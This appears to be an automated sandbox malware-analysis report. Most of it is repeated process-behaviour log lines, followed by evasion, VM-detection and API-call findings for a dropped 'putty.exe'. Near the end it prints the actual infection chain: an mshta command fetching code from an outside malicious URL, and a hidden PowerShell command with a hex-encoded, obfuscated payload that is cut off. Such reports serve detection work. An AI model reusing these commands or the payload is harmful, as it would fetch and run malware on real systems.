Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1944Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1600Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5378Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4301Jump to behavior
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]Jump to dropped file
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_12-88466
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_12-89402
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_12-89537
Source: C:\Users\user\AppData\Roaming\putty.exeAPI coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4248Thread sleep count: 1944 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5336Thread sleep count: 1600 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3700Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678633F40 FindFirstFileA,FindClose,12_2_00007FF678633F40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678626B00 GetProcAddress,FindFirstFileA,CloseHandle,12_2_00007FF678626B00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678632190 FindFirstFileA,FindClose,FindWindowA,12_2_00007FF678632190
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678600520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,12_2_00007FF678600520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000007.00000002.1772670631.000001FB69A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMG%SystemRoot%\system32\mswsock.dllring($TRZjYlWGC);$uIvTQuuE.Dispose();&$xbgxJDMGJ.Substring(0,3)$xbgxJDMGJ.Substring(3)M
Source: mshta.exe, 00000004.00000002.1793264894.0000023F9A0F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} I
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2768031375.00000253D2227000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2769230455.00000253D7856000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.1772670631.000001FB69AA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000007.00000002.1770606726.000001FB69820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: putty.exe, 0000000C.00000002.2767022134.0000022102F9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786AB7AC IsDebuggerPresent,OutputDebugStringW,12_2_00007FF6786AB7AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868AC78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF67868AC78
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786A4664 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6786A4664
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E6